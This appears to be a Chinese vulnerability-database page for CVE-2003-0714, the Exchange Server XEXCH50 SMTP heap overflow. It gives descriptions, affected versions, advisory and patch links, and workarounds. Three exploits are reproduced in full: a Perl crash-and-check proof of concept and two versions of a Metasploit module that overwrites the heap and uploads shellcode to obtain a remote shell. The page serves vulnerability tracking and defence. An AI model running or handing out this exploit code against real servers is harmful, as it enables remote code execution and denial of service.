CVE-2003-0714
CVSS7.5
发布时间 :2003-11-17 00:00:00
修订时间 :2016-10-17 22:36:47
NMCOEPS    

[原文]The Internet Mail Service in Exchange Server 5.5 and Exchange 2000 allows remote attackers to cause a denial of service (memory exhaustion) by directly connecting to the SMTP service and sending a certain extended verb request, possibly triggering a buffer overflow in Exchange 2000.


[CNNVD]Windows Exchange Server远程缓冲区溢出漏洞(CNNVD-200311-037)

        
        Microsoft Exchange Server是一款Microsoft公司开发的邮件服务程序。
        Exchange Server 2.5和2000对恶意verb请求缺少充分处理,远程攻击者可以利用这个漏洞以Exchange Server进程权限在系统上执行任意指令。
        Exchange Server 5.5中在Internet mail服务中存在一个安全问题,允许未验证用户连接Exchange Server的SMTP端口,发送特殊构建的扩展verb请求,导致分配一个超大内存,这可使Internet Mail服务关闭或者使服务停止响应。
        在Exchange 2000 Server中同样存在上面这个问题,这种请求可引起类似Exchange Server 5.5的拒绝服务。另外如果攻击者精心构建提交数据,可能以Exchange Server进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:exchange_server:2000Microsoft exchange_srv 2000
cpe:/a:microsoft:exchange_server:2000:sp3Microsoft Exchange Server 2000 Service Pack 3
cpe:/a:microsoft:exchange_server:2000:sp1Microsoft Exchange Server 2000 Service Pack 1
cpe:/a:microsoft:exchange_server:2000:sp2Microsoft Exchange Server 2000 Service Pack 2
cpe:/a:microsoft:exchange_server:5.5Microsoft exchange_srv 5.5
cpe:/a:microsoft:exchange_server:5.5:sp2Microsoft Exchange Server 5.5 Service Pack 2
cpe:/a:microsoft:exchange_server:5.5:sp3Microsoft Exchange Server 5.5 Service Pack 3
cpe:/a:microsoft:exchange_server:5.5:sp1Microsoft Exchange Server 5.5 Service Pack 1
cpe:/a:microsoft:exchange_server:5.5:sp4Microsoft Exchange Server 5.5 Service Pack 4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0714
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0714
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-037
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=106682909006586&w=2
(UNKNOWN)  BUGTRAQ  20031022 MS03-046 Microsoft Exchange 2000 Heap Overflow
http://www.cert.org/advisories/CA-2003-27.html
(UNKNOWN)  CERT  CA-2003-27
http://www.kb.cert.org/vuls/id/422156
(VENDOR_ADVISORY)  CERT-VN  VU#422156
http://www.microsoft.com/technet/security/bulletin/ms03-046.asp
(VENDOR_ADVISORY)  MS  MS03-046
http://www.securityfocus.com/bid/8838
(VENDOR_ADVISORY)  BID  8838

- 漏洞信息

Windows Exchange Server远程缓冲区溢出漏洞
高危 边界条件错误
2003-11-17 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Exchange Server是一款Microsoft公司开发的邮件服务程序。
        Exchange Server 2.5和2000对恶意verb请求缺少充分处理,远程攻击者可以利用这个漏洞以Exchange Server进程权限在系统上执行任意指令。
        Exchange Server 5.5中在Internet mail服务中存在一个安全问题,允许未验证用户连接Exchange Server的SMTP端口,发送特殊构建的扩展verb请求,导致分配一个超大内存,这可使Internet Mail服务关闭或者使服务停止响应。
        在Exchange 2000 Server中同样存在上面这个问题,这种请求可引起类似Exchange Server 5.5的拒绝服务。另外如果攻击者精心构建提交数据,可能以Exchange Server进程权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用SMTP协议检测过滤SMTP协议扩展:
        默认ISA for Exchange规则可过滤SMTP协议扩展,详细可参看:
        
        http://support.microsoft.com/default.aspx?scid=kb;en-us;311237.

        * 使用防火墙限制SMTP的使用。
        * 只接收验证过的SMTP会话,通过使用SMTP AUTH命令限制只接收验证过的会话。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-046)以及相应补丁:
        MS03-046:Vulnerability in Exchange Server could allow Arbitrary Code Execution (829436)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-046.asp

        补丁下载:
        Microsoft Exchange Server 5.5, Service Pack 4
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=A9E872EA-54B0-4179-8AE9-5648BFB46459&displaylang=en

        Microsoft Exchange 2000 Server, Service Pack 3
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=7BAF5394-1B4E-4937-A570-9F232AE49F01&displaylang=en

- 漏洞信息 (113)

MS Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046) (EDBID:113)
windows dos
2003-10-22 Verified
0 H D Moore
N/A [点击下载]
#!/usr/bin/perl -w
##################

##
# ms03-046.pl - hdm metasploit com
# This vulnerability allows a remote unauthenticated user to overwrite big chunks 
# of the heap used by the inetinfo.exe process. Reliably exploiting this bug is 
# non-trivial; even though the entire buffer is binary safe (even nulls) and can be 
# just about any size, the actual code that crashes varies widely with each request. 
# During the analysis process, numerous combinations of request size, concurrent 
# requests, pre-allocations, and alternate trigger routes were examined and not a 
# single duplicate of location and data offset was discovered. Hopefully the magic 
# combination of data, size, and setup will be found to allow this bug to be reliably 
# exploited.

# minor bugfix: look for 354 Send binary data

use strict;
use IO::Socket;

my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;


if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }

usage();


sub check
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    print $s "XEXCH50 2 2\r\n";
    my $res = <$s>;    
    close ($s);

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] This system is vulnerable: $host:$port\n";

    exit(0);
}


sub crash
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    # the negative value allows us to overwrite random heap bits
    print $s "XEXCH50 -1 2\r\n";
    my $res = <$s>;    

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] Sending massive heap-smashing string...\n";
    print $s ("META" x 16384);

    # sometimes a second connection is required to trigger the crash
    $s = SMTP($host, $port);

    exit(0);
}


sub usage 
{
    print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
    exit(0);

}

sub SMTP
{
    my ($host, $port) = @_;
    my $s = IO::Socket::INET->new
    (
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp"
    ) || return(undef);

    my $r = <$s>;
    return undef if !$r;
    
    if ($r !~ /Microsoft/)
    {
        chomp($r);
        print STDERR "[*] This does not look like an exchange server: $r\n";
        return(undef);
    }
    
    print $s "HELO X\r\n";
    $r = <$s>;
    return undef if !$r;   

    print $s "MAIL FROM: DoS\r\n";
    $r = <$s>;
    return undef if !$r;
    
    print $s "RCPT TO: Administrator\r\n";
    $r = <$s>;
    return undef if !$r;
    
    return($s); 
}


# milw0rm.com [2003-10-22]
		

- 漏洞信息 (16820)

MS03-046 Exchange 2000 XEXCH50 Heap Overflow (EDBID:16820)
windows remote
2010-11-11 Verified
25 metasploit
N/A [点击下载]
##
# $Id: ms03_046_exchange2000_xexch50.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MS03-046 Exchange 2000 XEXCH50 Heap Overflow',
			'Description'    => %q{
					This is an exploit for the Exchange 2000 heap overflow. Due
				to the nature of the vulnerability, this exploit is not very
				reliable. This module has been tested against Exchange 2000
				SP0 and SP3 running a Windows 2000 system patched to SP4. It
				normally takes between one and 100 connection attempts to
				successfully obtain a shell. This exploit is *very* unreliable.
			},
			'Author'         =>
				[
					'hdm', # original module
					'patrick', # msf3 port :)
				],
			'Version'        => '$Revision: 10998 $',
			'References'     =>
				[
					[ 'CVE', '2003-0714' ],
					[ 'BID', '8838' ],
					[ 'OSVDB', '2674' ],
					[ 'MSB', 'MS03-046' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/113' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Platform'       => 'win',
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x20:=+\x22",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[ 'Exchange 2000', { 'Ret' => 0x0c900c90, 'BuffLen' => 3000, 'Offset1' => 11000, 'Offset2' => 512 } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 15 2003'))

		register_options(
			[
				Opt::RPORT(25),
				OptString.new('MAILFROM', [ true, 'The FROM address of the e-mail', 'random@example.com']),
				OptString.new('MAILTO', [ true, 'The TO address of the e-mail', 'administrator']),
				OptInt.new('ATTEMPTS', [ true, 'The number of exploit attempts before halting', 100]),
			])
	end

	def check
		connect
		banner = sock.get_once

		if (banner !~ /Microsoft/)
			print_status("Target does not appear to be an Exchange server.")
			return Exploit::CheckCode::Safe
		end

		sock.put("EHLO #{Rex::Text.rand_text_alpha(1)}\r\n")
		res = sock.get_once
		if (res !~ /XEXCH50/)
			print_status("Target does not appear to be an Exchange server.")
			return Exploit::CheckCode::Safe
		end
		sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")
		res = sock.get_once

		if (res =~ /Sender OK/)
			sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")
			res = sock.get_once
			if (res =~ /250/)
				sock.put("XEXCH50 2 2\r\n")
				res = sock.get_once
				if (res !~ /Send binary data/)
					print_error("Target has been patched!")
					return Exploit::CheckCode::Detected
				else
					return Exploit::CheckCode::Appears
				end
			end
		end

		disconnect
	end

	def smtp_setup(count)
		print_status("Exploit attempt ##{count}")

		connect
		select(nil,nil,nil,1)
		banner = sock.get_once
		print_status("Connected to SMTP server: #{banner.to_s}")

		if (banner !~ /Microsoft/)
			print_status("Target does not appear to be running Exchange.")
			return
		end

		select(nil,nil,nil,5)
		sock.put("EHLO X\r\n")
		select(nil,nil,nil,7)
		res = sock.get_once

		if (res !~ /XEXCH50/)
			print_status("Target is not running Exchange.")
			return
		end

		sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")
		select(nil,nil,nil,3)

		sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")
		select(nil,nil,nil,3)

	end

	def exploit
		bufflen = target['BuffLen']
		print_status("Trying to exploit #{target.name} with address 0x%.8x..." % target['Ret'])
		count = 1 # broke

		begin
			if (count > datastore['ATTEMPTS'])
				print_error("Exploit failed after #{datastore['ATTEMPTS']}. Set ATTEMPTS to a higher value if desired.")
				return # Stop after a specified number of attempts.
			end

			if (session_created?)
				return # Stop the attack. Non-session payloads will continue regardless up to ATTEMPTS.
			end

			while(true)
				if (smtp_setup(count))
					print_status("Connection 1: ")
				end

				sock.put("XEXCH50 2 2\r\n")
				select(nil,nil,nil,3)
				res = sock.get(-1,3)
				print_status("#{res}")
				if (res !~ /Send binary data/)
					print_status("Target is not vulnerable.")
					return # commented out for the moment
				end

				sock.put("XX")

				print_status("ALLOC")

				size = 1024 * 1024 * 32

				sock.put("XEXCH50 #{size} 2\r\n")
				select(nil,nil,nil,3)

				sploit = (([target['Ret']].pack('V')) * 256 * 1024 + payload.encoded + ("X" * 1024)) * 4 + "BEEF"

				print_status("Uploading shellcode to remote heap.")

				if (sock.put(sploit))
					print_status("\tOK.")
				end

				print_status("Connection 2: ")
				smtp_setup(count) # Connection 2

				sock.put("XEXCH50 -1 2\r\n") # Allocate negative value
				select(nil,nil,nil,2)
				res = sock.get_once

				if (!res)
					print_error("Error - no response")
				end

				print_status("OK")

				bufflen += target['Offset2']

				if (bufflen > target['Offset1'])
					bufflen = target['BuffLen']
				end

				heapover = [target['Ret']].pack('V') * bufflen
				print_status("Overwriting heap with payload jump (#{bufflen})")
				sock.put(heapover)

				print_status("Starting reconnect sequences...")

				10.times do |x|
					print_status("Connect #{x}")
					connect
					sock.put("HELO X\r\n")
					disconnect
				end
			end

		rescue
			print_status("Unable to connect or Exchange has crashed... Retrying.")
			count += 1
			retry
		end

		disconnect
	end
end
		

- 漏洞信息 (F84536)

MS03-046 Exchange 2000 XEXCH50 Heap Overflow (PacketStormID:F84536)
2009-12-31 00:00:00
H D Moore,patrick  metasploit.com
exploit,overflow,shell
windows,2k
CVE-2003-0714
[点击下载]

This is an exploit for the Exchange 2000 heap overflow. Due to the nature of the vulnerability, this exploit is not very reliable. This Metasploit module has been tested against Exchange 2000 SP0 and SP3 running a Windows 2000 system patched to SP4. It normally takes between one and 100 connection attempts to successfully obtain a shell. This exploit is *very* unreliable.

##
# $Id: ms03_046_exchange2000_xexch50.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'MS03-046 Exchange 2000 XEXCH50 Heap Overflow',
			'Description'    => %q{
				This is an exploit for the Exchange 2000 heap overflow. Due
				to the nature of the vulnerability, this exploit is not very
				reliable. This module has been tested against Exchange 2000
				SP0 and SP3 running a Windows 2000 system patched to SP4. It
				normally takes between one and 100 connection attempts to
				successfully obtain a shell. This exploit is *very* unreliable.
			},
			'Author'         => 	[
							'hdm', # original module
							'patrick', # msf3 port :)
						],
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'CVE', '2003-0714' ],
					[ 'BID', '8838' ],
					[ 'OSVDB', '2674' ],
					[ 'MSB', 'MS03-046' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/113' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Platform'       => 'win',
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x20:=+\x22",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[ 'Exchange 2000', { 'Ret' => 0x0c900c90, 'BuffLen' => 3000, 'Offset1' => 11000, 'Offset2' => 512 } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 15 2003'))

			register_options(
			[
				Opt::RPORT(25),
				OptString.new('MAILFROM', [ true, 'The FROM address of the e-mail', 'random@example.com']),
				OptString.new('MAILTO', [ true, 'The TO address of the e-mail', 'administrator']),
				OptInt.new('ATTEMPTS', [ true, 'The number of exploit attempts before halting', 100]),
			])
	end
	
	def check
		connect
		banner = sock.get_once
		
		if (banner !~ /Microsoft/)
			print_status("Target does not appear to be an Exchange server.")
			return Exploit::CheckCode::Safe
		end

		sock.put("EHLO #{Rex::Text.rand_text_alpha(1)}\r\n")
		res = sock.get_once
		if (res !~ /XEXCH50/)
			print_status("Target does not appear to be an Exchange server.")
			return Exploit::CheckCode::Safe
		end
		sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")
		res = sock.get_once
		
		if (res =~ /Sender OK/)
			sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")
			res = sock.get_once
			if (res =~ /250/)
				sock.put("XEXCH50 2 2\r\n")
				res = sock.get_once
				if (res !~ /Send binary data/)
					print_error("Target has been patched!")
					return Exploit::CheckCode::Detected
				else
					return Exploit::CheckCode::Appears
				end
			end
		end
		
		disconnect
	end

	def smtp_setup(count)
		print_status("Exploit attempt ##{count}")

		connect
		sleep(1)
		banner = sock.get_once
		print_status("Connected to SMTP server: #{banner.to_s}")

		if (banner !~ /Microsoft/)
			print_status("Target does not appear to be running Exchange.")
			return
		end

		sleep(5)
		sock.put("EHLO X\r\n")
		sleep(7)
		res = sock.get_once

		if (res !~ /XEXCH50/)
			print_status("Target is not running Exchange.")
			return
		end

		sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")
		sleep(3)

		sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")
		sleep(3)

	end

	def exploit
		bufflen = target['BuffLen']
		print_status("Trying to exploit #{target.name} with address 0x%.8x..." % target['Ret'])
		count = 1 # broke

		begin
			if (count > datastore['ATTEMPTS'])
				print_error("Exploit failed after #{datastore['ATTEMPTS']}. Set ATTEMPTS to a higher value if desired.") 
				return # Stop after a specified number of attempts.
			end

			if (session_created?)
				return # Stop the attack. Non-session payloads will continue regardless up to ATTEMPTS.
			end

			while(true)
				if (smtp_setup(count))
					print_status("Connection 1: ")
				end

				sock.put("XEXCH50 2 2\r\n")
				sleep(3)
				res = sock.get(-1,3)
				print_status("#{res}")
				if (res !~ /Send binary data/)
					print_status("Target is not vulnerable.")
					return # commented out for the moment
				end

				sock.put("XX")

				print_status("ALLOC")

				size = 1024 * 1024 * 32

				sock.put("XEXCH50 #{size} 2\r\n")
				sleep(3)

				sploit = (([target['Ret']].pack('V')) * 256 * 1024 + payload.encoded + ("X" * 1024)) * 4 + "BEEF"

				print_status("Uploading shellcode to remote heap.")

				if (sock.put(sploit))
					print_status("\tOK.")
				end

				print_status("Connection 2: ")
				smtp_setup(count) # Connection 2

				sock.put("XEXCH50 -1 2\r\n") # Allocate negative value
				sleep(2)
				res = sock.get_once

				if (!res)
					print_status("Error - no response")
				end

				print_status("OK")

				bufflen += target['Offset2']

				if (bufflen > target['Offset1'])
					bufflen = target['BuffLen']
				end

				heapover = [target['Ret']].pack('V') * bufflen
				print_status("Overwriting heap with payload jump (#{bufflen})")
				sock.put(heapover)

				print_status("Starting reconnect sequences...")

				10.times do |x|
					print_status("Connect #{x}")
					connect
					sock.put("HELO X\r\n")
					disconnect
				end
			end

		rescue 
			print_status("Unable to connect or Exchange has crashed... Retrying.")
			count += 1
			retry
		end

		disconnect
	end
end
    

- 漏洞信息

2674
Microsoft Exchange SMTP Extended Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

Microsoft Exchange contains a flaw that may allow a remote attacker to execute arbitrary code or cause a denial of service. The flaw is due to the SMTP server's improper handling of XEXCH50 verb requests. If an un-authenticated attacker issues a specially-crafted extended verb request, it may exhaust the available memory of the server or in some cases, allow the execution of arbitrary code.

- 时间线

2003-10-15 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Exchange Server Buffer Overflow Vulnerability
Boundary Condition Error 8838
Yes No
2003-10-15 12:00:00 2009-07-11 11:56:00
Credited to João Gouveia.

- 受影响的程序版本

Microsoft Exchange Server 2000 SP3
Microsoft Exchange Server 2000 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 2000 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 2000
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 5.5 SP4
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP3
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP2
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP1
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0

- 漏洞讨论

Microsoft has announced that Exchange Server is affected by a remotely exploitable buffer overflow condition. The overflow can be triggered remotely by unauthenticated SMTP clients. The source of the issue appears to be in how the XEXCH50 verb is handled by the server. Microsoft has stated that remote code execution is possible on hosts running Exchange 2000 Server. Servers running Exchange Server 5.0 and 5.5 are vulnerable to a denial of service attack.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A denial of service proof-of-concept has been made available:

- 解决方案

Patches are available.

Microsoft has released an update to thir advisory MS03-046 reporting the Exchange Server and related fixes. Please see the referenced advisory for more information and details on obtaining fixes.


Microsoft Exchange Server 5.0 SP2

Microsoft Exchange Server 2000 SP3

Microsoft Exchange Server 5.5 SP4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站